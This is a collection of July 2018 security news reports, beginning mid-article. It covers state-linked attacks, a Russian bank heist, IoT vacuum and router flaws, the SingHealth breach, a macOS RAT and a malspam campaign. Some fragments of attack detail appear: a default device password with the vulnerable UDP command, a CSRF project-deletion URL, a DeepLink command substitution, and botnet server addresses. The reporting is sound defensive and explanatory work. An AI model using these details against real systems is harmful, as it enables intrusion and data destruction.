Russia and North Korea are particularly close. "Both Russia and North Korea are counteracting economic sanctions imposed by the West with cybercrime against the financial sector," he said. "North Korea itself has become much more adept and sophisticated with their cyber-attacks as they are mirroring the Russian kill chain, and they are using more and more exploits and more and more custom malware. Just as the North Korean missile systems are typically based on Russian missiles, so you have the same amount of tech transfer in cyber capabilities."

He sees no reduction in cyber-attacks from any of these countries, and expects South China Sea tensions and the potential for global trade wars to simply exacerbate the problem. "In fact," he said, "the new group Hidden Cobra has been quite prolific -- you just don't hear much about them because the financial institution victims are trying to keep this conversation quiet. But Hidden Cobra is the greatest testament to the advancement of cyber capabilities in North Korea."

Nor does he exclude Iran from this group, pointing out that as long ago as the Stuxnet issue, it was Russia that Iran turned to for, and received from, cyber assistance. There are even suggestions that Russian experts analyzed Stuxnet and returned it to Iran in the form of the original Shamoon malware used against Saudi Aramco.

But Kellermann doesn't think an understanding of the source of the attacks is an important as an understanding of how they are being operated. "I really think that the indications of counter incident response are the powerful statistics; and that 36% of the attacks are not directed against the initial victim -- basically, after they've done stealing from you they're going to use your network to target people that trust you. That has to be something we are acutely aware of and cognizant of in how we structure business partnerships, and in how we secure our information supply chain going forward."

He feels that the U.S. is currently suffering under an Administration that is not sufficiently focused on cyber security. "Not only does the US not even have a Cyber Czar, but this Administration has not taken cyber security seriously -- as evidenced by the rapid retirement rate of professionals who would have been lifers under a different administration. I am incredibly concerned that we're dealing with an adversary that has already colonized wide swathes of British and American infrastructure, and we're really fighting someone from the inside out."

He believes that the real message coming from this survey of incident responders is that business needs to re-architect its cybersecurity. "We need to change the architectural model away from a castle-like structure and more towards that of a prison, where we can force the adversary to be resourced constrained, where we inhibit their capacity to move laterally and we hunt them and monitor them without them knowing that we're doing so. That's the type of environment we need to migrate to -- I call that environment 'intrusion suppression'."

To achieve this, he believes that business must move to silent hunting. "This could be done with iron boxing, modern whitelisting, next gen AV that includes endpoint detection and response, and deception technology. Hunt tools need to be more widely deployed. Memory augmentation should be employed, and adaptable authentication based on the level of risk can enforce 2 or 3 factor authentication with a biometric live challenge/response, all depending on the level of risk. Existing outward-facing network defenses are largely failing. The modern network has really evolved to cloud and mobility which makes the security of the endpoints paramount, and the capacity to record and monitor all activity on the endpoints is absolutely quintessential to success."


DOJ Cybersecurity Task Force Outlines Plans for Protecting Elections
22.7.2018 securityweek Cyber

The U.S. Justice Department’s Cyber-Digital Task Force made public its first report on Thursday, covering the threat to elections, cybercrime schemes, and various other topics.

The role of the Cyber-Digital Task Force, announced in February by the Attorney General, is to help the Department of Justice find ways to combat cyber threats and become more efficient in this area.

The task force focuses on election interference, critical infrastructure disruptions, use of the Internet for spreading violent ideologies and recruiting followers, botnets, the use of technology designed to hide criminal activities, and the theft of sensitive data.

The first chapter of the 156-page report focuses on what the Attorney General describes as “one of the most pressing cyber-enabled threats” confronting the U.S., specifically “malign foreign influence operations” and their impact on elections and other democratic institutions.

The types of threats described in the report include operations targeting voting machines, voter registration databases and other election infrastructure; operations targeting political entities; and covert influence operations whose goal is to harm political organizations and public officials.

The report specifically names Russia and cites the recent indictments related to the hacking of the Democratic National Committee (DNC) and attempts to influence the 2016 presidential election.

Authorities are also concerned about disinformation operations that abuse social media and other forums to influence public opinion and sow division, and overt influence operations that involve lobbyists and foreign media.

The report also focuses on the upcoming midterm elections, which intelligence officials believe will be targeted by Russia. The Kremlin is expected to apply lessons learned from the campaign aimed at the 2016 election.

The task force has outlined plans to combat threats to the 2018 midterm elections, including ballot fraud, for which authorities believe the risk is real, despite no evidence of successful attempts.

The report also describes a framework for countering malign foreign influence operations aimed at the midterm elections.

Microsoft representatives revealed this week that the company already identified election-related hacking attempts. The tech giant spotted some phishing websites that appeared to be aimed at three unnamed congressional candidates.

“The Department of Justice plays an important role in combating foreign efforts to interfere in our elections, but it cannot alone solve the problem. There are limits to the Department’s role—and the role of the U.S. government—in addressing foreign influence operations aimed at sowing discord and undermining our Nation’s institutions,” the task force noted. “Combating foreign influence operations requires a whole-of-society approach that relies on coordinated actions by federal, State, and local government agencies; support from potential victims and the private sector; and the active engagement of an informed public.”

The next two chapters of the report are dedicated to cybercrime schemes, including damage to computer systems, fraud, data theft, threats to privacy (e.g. sextortion), and critical infrastructure attacks.

Chapter 4 of the report shows how the FBI responds to cyber threats, and Chapter 5 describes the Department of Justice’s efforts on training and managing its workforce.

The complete report is available from the DOJ in PDF format.


Trump-Putin Meeting Puts Finland on Cyber-Attack Target List
22.7.2018 securityweek BigBrothers

Historically, Finland has not been targeted by a high number of cyber-attacks, but digital assaults spiked in the days prior to the July 16 meeting between U.S. President Donald Trump and Russian President Vladimir Putin in Helsinki.

The massive rise in cyber-attacks isn’t surprising, given the precedent established earlier this year, when Singapore received a massive wave of attacks from June 11 to June 12, during the Trump-Kim summit.

While most of the cyber-attacks observed during President Trump’s meeting with the North Korean leader appeared to originate from Russia, those observed last week were mainly launched from China, F5 reports.

The Finland and Singapore cyber-attacks showed some similarities in targeted ports, which included SIP port 5060, which is typically used by VoIP phones (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

The most attacked port in the new wave of assaults, however, was SSH port 22, followed by SMB port 445. SSH is often used for the secure remote administration of Internet of Things (IoT) devices, but vendors often secure devices with easily guessable credentials, which turns these products into easy targetes for cybercriminals.

“The device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks,” F5 notes.

The Finland assaults also targeted ports that weren’t seen in the Singapore attacks, including HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Despite the massive spike in cyber-attacks targeting Finland between July 12 and July 15, the country remained far behind top targeted countries. Compared to Canada, which typically makes it to top 10 but not top 5, Finland received on a small fraction of cyber-attacks on July 12 and July 14 and “doesn’t even register on the chart,” F5 says.

The top targeting countries during the spike were China (29%), United States (14%) and France (9%), followed by Italy (8%) and Russia (7%). Many of the attacks originated from networks usually seen launching such attacks, the security researchers say.

ChinaNet, consistently at the top of the threat actor network list globally, remained the top attacking network during the attack spike.

Such attacks, F5 notes, are possible because of the rise of poorly secured IoT devices. By targeting vulnerable devices, nation-states, spies, mercenaries, and others can easily launch attacks against anyone.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 notes.


MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank
22.7.2018 securityaffairs  Incindent

The cybersecurity firm Group-IB is involved in the incident response on an attack on the Russian PIR Bank conducted by MoneyTaker hacking group.
MoneyTaker hacker group has stolen 1 million US dollars from the Russian bank, the cyber heist occurred on July 3 through the Russian Central Bank’s Automated Workstation Client (an interbank fund transfer system similar to SWIFT).

Crooks transferred the money to 17 accounts at major Russian banks and cashed out, then tried to ensure persistence in the bank’s network for later attacks. The bank hired Group-IB in order to respond to the incident and limit the damages.

According to Kommersant newspaper, the MoneyTaker hacking group stole around $920,000 (which is a conservative estimate) from the Russian bank. The PIR Bank officially confirmed the attack, but it was unable to determine the exact amount of money stole by the attackers.

Even if the bank managed to delay the withdrawal of the stolen funds, most of them are lost.

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible. At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents,” said Olga Kolosova, Chairperson of the Management Board of PIR Bank LLC.

Forensics analysis of workstations and servers at the bank revealed that the attack was launched by the MoneyTaker hacker group. The hackers used specific tools and techniques that had been used earlier by MoneyTaker in previous attacks on financial institutions. The experts also noticed that the IP addresses of their C&C servers were the same used in previous attacks.

MoneyTaker is a cybercrime gang specialized in targeted attacks on financial institutions, in December 2017 Group-IB published a detailed report on its activity (MoneyTaker: 1.5 Years of Silent Operations). The group is focused on card processing and interbank transfer systems (AWS CBR and SWIFT).

MoneyTaker hacker group

The MoneyTaker group has been active at least since spring 2016 when they stole money from a U.S. bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers went in the dark for almost 4 months and only attacked banks in Russia in September 2016.

Group-IB recorded 10 MoneyTaker attacks against organizations in the U.S., UK, and Russia. Since 2017, the group restricted the geography of the attacks to Russia and the U.S.

In 2018, Group-IB tracked two MoneyTaker attacks in Russia.

“MoneyTaker has its own set of specific TTPs. The hackers try to go unnoticed, use ‘one-time’ infrastructure, ‘fileless’ software and carefully cover up traces of their presence. This involves specific usages of Metasploit and PowerShell Empire frameworks.” states Group-IB.

Back to the PIR Bank attack, Group-IB confirmed that the attack on PIR Bank started in late May 2018. Hackers gained access to the bank by compromising router used by one of the bank’s regional branches.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.” reads the press release published by Group-IB.

MoneyTaker group use PowerShell scripts to establish persistence in the banks’ systems and automate some stages of their attack. Once the crooks have hacked the bank’s main network, they managed to gain access to AWS CBR (Automated Work Station Client of the Russian Central Bank) to generate payment orders and send money in several tranches to mule accounts prepared in advance.

On the evening of July 4, bank IT staff discovered the unauthorized transactions with large sums, it quickly asked the regulator to block the AWS CBR digital signature keys, but it was not possible to stop the financial transfers in time.

Most of the stolen money was transferred to cards of the 17 largest banks on the same day and immediately cashed out by money mules involved in the final stage of money withdrawal from ATMs.

MoneyTaker hackers cleared OS logs on many computers, which was meant to hinder the response to the incident and its subsequent investigation, a technique already observed in other attacks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response this was detected by Group-IB employees and removed by the bank’s sysadmins.” added Group-IB.

“This is not the first successful attack on a Russian bank with money withdrawal since early 2018,” says Valeriy Baulin, Head of Digital Forensics Lab Group-IB, “We know of at least three similar incidents, but we cannot disclose any details before our investigations are completed. As for withdrawal schemes, each group specializing in targeted attacks – Cobalt, Silence and MoneyTaker (these have been the most active groups in 2018) – have their own scheme depending on the amounts and cashout scenarios. We should understand that attacks on AWS CBR are difficult to implement and are not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind.”


Experts disclose dangerous flaws in robotic Dongguan Diqee 360 smart vacuums
22.7.2018 securityaffairs 
Vulnerebility

Positive Technologies discovered two flaws affecting Dongguan Diqee 360 smart vacuums that can be used to perform video surveillance.
Security researchers from Positive Technologies have discovered two vulnerabilities affecting Dongguan Diqee 360 smart vacuum cleaners that could be exploited by an attacker to run malicious code on a device with superuser privileges.

The flaws likely affect smart vacuum cleaners made by the company and sold under other brands as well, experts believe the issue could affect also other Dongguan devices, including DVRs, surveillance cameras, and smart doorbells.

“Like any other IoT device, these robot vacuum cleaners could be marshalled into a botnet for DDoS attacks, but that’s not even the worst-case scenario, at least for owners. Since the vacuum has Wi-Fi, a webcam with night vision, and smartphone-controlled navigation, an attacker could secretly spy on the owner” reads the post published by Positive Technologies.

The two vulnerabilities have been tracked as CVE-2018-10987 and CVE-2018-10988, the former could be exploited by a remote attacker meanwhile the latter needs physical access to the device.

The first bug can only be exploited by an authenticated attacker, but Positive Technologies says all Diqee 360 devices come with a default password of 888888 for the admin account, which very few users change, and which attackers can incorporate into their exploit chain.

smart vacuums

Once an authenticated attacker has discovered the vacuum on the network by obtaining its MAC address it will send a specially crafted UDP packet, and execute commands on the
vacuum cleaner as root. The bug resided in the function REQUEST_SET_WIFIPASSWD (UDP command 153).
” An attacker can discover the vacuum on the network by obtaining its MAC address and send a UDP request, which, if crafted in a specific way, results in execution of a command with superuser rights on the vacuum.” reads the report published by the experts.

“The vulnerability resides in the REQUEST_SET_WIFIPASSWD function (UDP command 153). To succeed, the attacker must authenticate on the device—which is made easier by the fact that many affected devices have the default username and password combination (admin:888888).”

The second vulnerability requires physical access to be triggered, it can be exploited by an attacker to load a tainted version of the firmware by inserting a microSD card into the vacuum.

“A microSD card could be used to exploit weaknesses in the vacuum’s update mechanism. After the card is inserted, the vacuum update system runs firmware files from the upgrade_360 folder with superuser rights, without any digital signature check. Therefore, a hacker could create a special script, place it on a microSD card in the upgrade_360 folder, insert this card, and restart the vacuum. This script could run arbitrary code, such as a sniffer to intercept private data sent over Wi-Fi by other devices.” states the post.

Positive Technologies responsibly reported the flaws in the smart vacuums to the company giving it the time to address the vulnerabilities, unfortunately, it does not have any information about whether or not the vulnerabilities have been fixed to date


Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours
22.7.2018 securityaffairs BotNet

The popular Anarchy botmaster builds a botnet of 18,000 Huawei routers in a few hours, and it is also planning to target vulnerable Realtek routers.
NewSky Security first reported the born a new huge botnet, in just one day the botmaster compromised more than 18,000 Huawei routers.

NewSky security researcher Ankit Anubhav announced that the botnet had already infected 18,000 routers. The disconcerting aspect of the story is that the hacker gathered a so huge number of devices in a limited period of time, without using any zero-day issue.

The same botnet was today reported by experts from other security firms, including Qihoo 360 Netlab, Greynoise, and Rapid7.

360 Netlab
@360Netlab
We were tracking this botnet yesterday, the claimed 18000+ huawai router number is probably inflated, as we were able to take a peek at the file which highly likely stored the infected ips, the total count was 10901. and attached is the graphic of the C2 for this botnet, big one.

Ankit Anubhav
@ankit_anubhav
Just in : IoT hacker identifying himself as "Anarchy" has claimed to hack about 18000+ Huawei routers.The vulnerability is 2017-17215, leaked last Christmas & used in satori

He also takes responsibility for massive uptick in Huawei scanning now as seen in @360Netlab scanmon. 1/n

View image on Twitter
3:43 AM - Jul 19, 2018
39
38 people are talking about this
Twitter Ads info and privacy
The botmaster has infected systems by exploiting the CVE-2017-17215 vulnerability in Huawei HG532 routers. Experts noticed that the attackers started scanning for the flaw, that could be triggered via port 37215, on July 18.
Anarchy botnet
The botmaster is a hacker that goes online with the moniker “Anarchy,” according to Anubhav he was previously identified as Wicked and was involved in the born of the homonymous Mirai variant.

The Wicked Mirai botnet was first spotted by researchers at Fortinet, and Anubhav published on the NewSky’s blog and interview with the hacker.

Wicked/Anarchy is believed to be the threat actor behind other Mirai variants, including, Omni, and Owari (Sora).

As explained at the beginning of this post, Anarchy did not use any specific exploit to gather tens of thousands of devices in a few hours. The CVE-2017-17215 is a well-known vulnerability that was used by many other botnets, including the Mirai Satori, to gather zombies.

The CVE-2017-17215 zero-day vulnerability in the Huawei home router residing in the fact that the TR-064 technical report standard, which was designed for local network configuration, was exposed to WAN through port 37215 (UPnP – Universal Plug and Play).

The exploit code used to target the Huawei routers is publicly available, in December Ankit Anubhav discovered it on Pastebin.com..

“NewSky Security observed that a known threat actor released working code for Huawei vulnerability CVE-2017–17215 free of charge on Pastebin this Christmas. This exploit has already been weaponized in two distinct IoT botnet attacks, namely Satori and Brickerbot.” stated a blog post published by Anubhav.

At the time, the exploit code for the CVE- 2017-17215 was used by a hacker identified as “Nexus Zeta” to spread the Satori bot (aka Okiku).

The availability of the code online represents a serious risk, it could become a commodity in the criminal underground, vxers could use it to build their botnet.

Satori isn’t the only botnet leveraging the CVE-2017-17215 exploit code, earlier in December, the author of the Brickerbot botnet that goes online with the moniker “Janitor” released a dump which contained snippets of Brickerbot source code.

NewSky Security analyzed the code and discovered the usage of the exploit code CVE-2017–17215, this means that the code was available in the underground for a long.

According to Bleeping Computer, Anarchy told Anubhav that he also plans to target the CVE-2014-8361 flaw in Realtek routers that is exploitable via port 52869.

“Testing has already started for the Realtek exploit during the night,” Anubhav told Bleeping Computer in a private conversation today. [Update: Both Rapid7 and Greynoise are confirming that scans for Realtek have gone through the roof today.]

Below the md5 and the C&C associated with the threat:

Ankit Anubhav
@ankit_anubhav
· 18 Jul
Just in : IoT hacker identifying himself as "Anarchy" has claimed to hack about 18000+ Huawei routers.The vulnerability is 2017-17215, leaked last Christmas & used in satori

He also takes responsibility for massive uptick in Huawei scanning now as seen in @360Netlab scanmon. 1/n pic.twitter.com/qOATps9Dmv

Ankit Anubhav
@ankit_anubhav
The attacker Anarchy has shared a list of infected victim IPs which at that point, I am not making public for obvious reasons. The bin in his botnet md5 >
c3cf80d13a04996b68d7d20eaf1baea8

As one can see, it uses only 1 exploit, 2017-17215. 2/n pic.twitter.com/F5BNNbf3bM

8:27 PM - Jul 18, 2018
View image on Twitter
9
See Ankit Anubhav's other Tweets
Twitter Ads info and privacy

SMII Mondher
@smii_mondher
Ketashi botnet
hxxp://104.244.72.82
hxxp://104.244.72.82/sister
hxxp://104.244.72.82/k
http://104.244.72.82/gpon#ketashi @360Netlab @ankit_anubhav @campuscodi

4:17 PM - Jul 19, 2018
3
See SMII Mondher's other Tweets


SingHealth, largest healthcare group in Singapore, suffered a massive data breach
22.7.2018 securityaffairs  Incindent

SingHealth, the largest healthcare group in Singapore, suffered a massive data breach that exposed 1.5 Million patient records.
The largest healthcare group in Singapore, SingHealth, has suffered a massive data breach that exposed personal information of 1.5 million patients who visited the clinics of the company between May 2015 and July 2018. Stolen records include patient’s name, address, gender, race, date of birth, and National Registration Identity Card (NRIC) numbers.

SingHealth has 42 clinical specialties, a network of 2 Hospitals, 5 National Specialty Centres, 9 Polyclinics, and Bright Vision Community Hospital.

According to a data breach notification released by Singapore’s Ministry of Health (MOH), hackers stole personal information along with ‘information on the outpatient dispensed medicines’ of about 160,000 patients. Data belonging to Singapore’s Prime Minister Lee Hsien Loong and of other ministers have been exposed in the security breach.

“About 1.5 million patients who visited SingHealth’s specialist outpatient clinics and polyclinics from 1 May 2015 to 4 July 2018 have had their non-medical personal particulars illegally accessed and copied. The data taken include name, NRIC number, address, gender, race and date of birth. Information on the outpatient dispensed medicines of about 160,000 of these patients was also exfiltrated. The records were not tampered with, i.e. no records were amended or deleted.” reads the data breach notification.

“On 4 July 2018, IHiS’ database administrators detected unusual activity on one of SingHealth’s IT databases. They acted immediately to halt the activity,”

SingHealth Singapore hack

According to Singapore’s authorities, the hackers specifically and repeatedly targeted Prime Minister Lee Hsien Loong’s data.

MOH explained that the data breach is the result of a targeted attack, local media speculate the involvement of a nation-state actor in the cyber attack.

“Investigations by the Cyber Security Agency of Singapore (CSA) and the Integrated Health Information System (IHiS)[1] confirmed that this was a deliberate, targeted and well-planned cyberattack. It was not the work of casual hackers or criminal gangs.” reads the press release.

Commenting on the cyber attack through a Facebook post published today,

Singapore’s Prime Minister declared the attackers are “extremely skilled and determined” and they have “huge resources” to conduct such cyber attacks repeatedly, a attacker’s profile that match with an APT group.

“I don’t know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret or at least something to embarrass me. If so, they would have been disappointed,” Singapore PM said. “My medication data is not something I would ordinarily tell people about, but nothing is alarming in it.” wrote Singapore’s Prime Minister.

“Those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying. Government systems come under attack thousands of times a day. Our goal has to be to prevent every single one of these attacks from succeeding. If we discover a breach, we must promptly put it right, improve our systems, and inform the people affected.”

The good news for Singapore citizens is that no medical records were accessed by hackers.

All affected patients will be contacted by the healthcare institution over the next five days.


Trump-Putin Meeting was the root cause of a spike of cyber attacks against Finland
22.7.2018 securityaffairs  BigBrothers

F5 experts observed a spike in the attacks in the days prior to the Trump-Putin meeting on July 16 that was held in Helsinki, Finland.
Important events represent an element of attraction for cyber attacks, in June we discussed the Trump-Kim summit and the way Singapore that held it was hit by an unprecedented number of attacks from June 11 to June 12.

At the time most of the cyber attacks were originated in Russia.

Let’s analyze the effect in the cyberspace of another event, the Trump-Putin meeting that was held in Helsinki in Finland that historically is not a privileged target of hackers.

The experts pointed out that they have no data to suggest the attacks against Finland were successful.

Once again researchers at security firm F5 analyzed the number of attacks that hit the location during the summit and made an interesting discovery, most of the cyber attacks were originated in China.

“On July 16th, President Trump met with Vladimir Putin in Helsinki, Finland. As expected, attacks against Finland skyrocketed days before the meeting. What’s interesting this time around is that Russia wasn’t the top attacker—perhaps because Trump was meeting with Putin? In this case, China was the top attacker.” reports the security firm F5.

Trump-Putin attacks

Experts observed many similarities between the attacks that were observed against the countries that hosted the two meeting. Hackers targeted the same ports, including included SIP port 5060 typically used by VoIP systems (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

Most of the attacks targeted SSH port 22 which is typically used for the secure remote administration of Internet of Things (IoT) devices. Attackers scan for devices configured with default credentials to compromise them with brute force attacks.

The second most targeted port was the SMB port 445.

“The challenge is that the device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks. ” continues F5.

Experts noticed that some ports targeted by the attacks during the Trump-Putin meeting were not hit during the Singapore summit, for example, the HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used for web cameras, and RDP port 3389.

Experts highlighted that Finland is not included in the list of top-targeted countries.

Which were the other top targeting countries during the Helsinki meeting?

The top targeting countries were

China (29%);
United States (14%);
France (9%);
Italy (8%);
Russia (7%);
According to F5, ChinaNet was the top attacking network during the attack spike.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 concludes.


Experts discovered Calisto macOS Trojan, the first member of Proton RAT family
22.7.2018 securityaffairs  Apple

Security experts from Kaspersky Lab have discovered a precursor of the infamous Proton macOS malware that was named Calisto.
Malware researchers from Kaspersky Lab have discovered a malware, tracked as Calisto, that appears to be to the precursor of the Proton macOS malware.

“We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.” reads the analysis published by Kaspersky.

“Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:”

The malicious code seems to have been developed in 2016, while Proton was first spotted in 2017.

According to the experts, the malware was uploaded on VirusTotal in 2016 but none noticed it until May 2018. Kaspersky has no information about the way the threat was propagated, they immediatelly noticed that some features implemented by Calisto were still under development.

The Calisto installation file is an unsigned DMG image under the guise of Intego’s security solution for Mac.

The analysis published by Kaspersky revealed that many features implemented in Proton malware were not present in Calisto.

Proton malware was first discovered in March 2017, threat actors were offering for sale it on an underground hacking forum for a price ranging from $1,200 to $830,000 for the entire project.

A few weeks later the malware was involved in attacks in the wild for the first time, threat actors hacked the website of the HandBrake app and poisoned the official app with it.

In October 2017 attackers distributed the Proton RAT poisoning legitimate applications, such as the popular Elmedia Player and download manager Folx developed by the Elmedia Player.

Both Proton RAT and Calisto are remote access Trojan (RAT) that once infected a system give the attackers full control over it.

Calisto allows remote control of infected Macs, below some of the features it implements:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
Static analysis conducted by the experts revealed unfinished functionality, including:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS
Experts pointed out that Calisto was developed before Apple rolled out the SIP (System Integrity Protection) security mechanism for this reason it is not able to bypass it.

“Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions.” researchers explained. “Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.”

This implies that Calisto cannot infect modern macOS versions, anyway below a few recommendations to protect against Calisto, Proton, and similar threats:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software
Currently Calisto appears to have been abandoned by its authors.


Expert discovered it was possible to delete all projects in the Microsoft Translator Hub
22.7.2018 securityaffairs  Security

Microsoft has addressed a serious vulnerability in the Microsoft Translator Hub that could be exploited to delete any or all the projects hosted by the service.
Microsoft has fixed a severe vulnerability in the Microsoft Translator Hub that could be exploited to delete any or all projects hosted by the service.

The Microsoft Translator Hub “empowers businesses and communities to build, train, and deploy customized automatic language translation systems—-”.

The vulnerability was discovered by the security expert Haider Mahmood that was searching for bugs on the Translator Hub, he discovered that is was possible to remove a project by manipulating the “projectid” parameter in an HTTP request.

“POST request with no content and parameter in the URL (its kinda weird isn’t it?) the “projectid” parameter in the above request is the ID of the individual project in the database, which in this case is “12839“, by observing the above HTTP request, a simple delete project query could be something like:-” wrote the expert in a blog post.

The expert also discovered a Cross-Site Request Forgery (CSRF) vulnerability that could be used by an attacker to impersonate a legitimate, logged in user and perform actions on its behalf.

An attacker with the knowledge of the ProjectID of a logged user just needs to trick victims into clicking a specifically crafted URL that performs the delete action on behalf of the user. Another attack scenario sees the attacker including the same URL in a page that once visited by the victim will allow the project to be removed.

“Wait a minute, if you take a look at the Request, first thing to notice is there is no CSRF protection. This is prone to CSRF attack.” continues the expert. “In simple words, CSRF vulnerability allows attacker to impersonate legit logged in user, performing actions on their behalf. Consider this:-

Legit user is logged in.
Attacker includes the URL in a page. (img tag, iframe, lots of possibilities here) “http://hub.microsofttranslator.com/Projects/RemoveProject?projectId=12839”
Victim visits the page, above request will be sent from their browser.
Requirement is that one should know the ProjectID number of logged in victim.
As it has no CSRF projection like antiCSRF tokens it results in the removal of the project.
Even if it has Anti-CSRF projection, here are ways to bypass CSRF Token protections.”
Further analysis allowed the expert to discover the worst aspect of the story.

Mahmood discovered an Indirect Object Reference vulnerability, which could be exploited by an attacker to set any ProjectID in the HTTP request used to remove project.

Theoretically, an attacker can delete all projects in Microsoft Translator Hub by iterating through project IDs starting from 0 to 13000.

“The project whose projectID I used in the HTTP request got deleted. Technically this vulnerability is called Indirect Object Reference. now if I just loop through the values starting from 0 to 13000 (last project), I’m able to delete all projects from the database.” continues the expert. “The vulnerability could have been avoided using simple checks, either the project that the user requested is owned by the same user, associating the project owner with the project is another way, but its Microsoft so….”

Microsoft Translator Hub SecurityBulletin-1024x307

Mahmood reported the flaw to Microsoft in late February 2018 that addressed it is a couple of weeks,


TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT
22.7.2018 securityaffairs 
Virus

Proofpoint uncovered a massive malspam campaign leveraging emails delivering weaponized PDF documents containing malicious SettingContent-ms files.
Security experts from Proofpoint have uncovered a massive malspam campaign, crooks sent hundreds of thousands of emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Experts attributed the malspam campaign to the cybercriminal group tracked as TA505, the attackers are spreading the FlawedAmmyy RAT.

The SettingContent-ms file format was implemented in Windows 10 to allows a user to create “shortcuts” to various Windows 10 setting pages.

Thi file opens the Control Panel for the user [control.exe], experts noticed that it includes the <DeepLink> element in the schema.

SettingContent-ms files

This element takes any binary with parameters and executes it, this means that an attacker can substitute ‘control.exe’ with a malicious script that could execute any command, including cmd.exe and PowerShell, without user interaction.

“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from Specterops.

“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”

Experts noticed that maliciously SettingContent-ms file can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.

In June experts from SpecterOps monitored several campaigns abusing the SettingContent-ms file format within Microsoft Word documents, but only a few days ago Proofpoint experts noticed threat actors leveraging PDF documents.

“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.

“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”

SettingContent-ms files campaign

Once the victim has opened the PDF file, Adobe Reader will display a warning message asking the user if they want to open the file, since it is attempting to run the embedded “downl.SettingContent-ms” via JavaScript. Experts noticed that the warning message is displayed for any file format embedded within a PDF, not only for SettingContent-ms files.

If the victim clicks the “OK” prompt, the PowerShell command included in the <DeepLink> element downloads and execute the FlawedAmmyy RAT.

The FlawedAmmyy RAT has been active since 2016, it borrows the code of the Ammyy Admin remote access Trojan.

FlawedAMMYY implements common backdoor features, it allows attackers to manage files, capture the screen, remote control the machine, establish RDP SessionsService, and much more.

Experts attributed the malspam campaign to the TA505 threat actor based on email messages, as well as the payload.

The TA505 operates on a large scale, it was behind other major campaigns leveraging the Necurs botnet to deliver other malware, including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.

“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” concludes Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”


Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.2018 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
In 2012 a British judge ruled WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault there, but Assange received political asylum from Ecuador and spent the last years in its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week, this means that Assange will leave the embassy and British authorities will catch him.

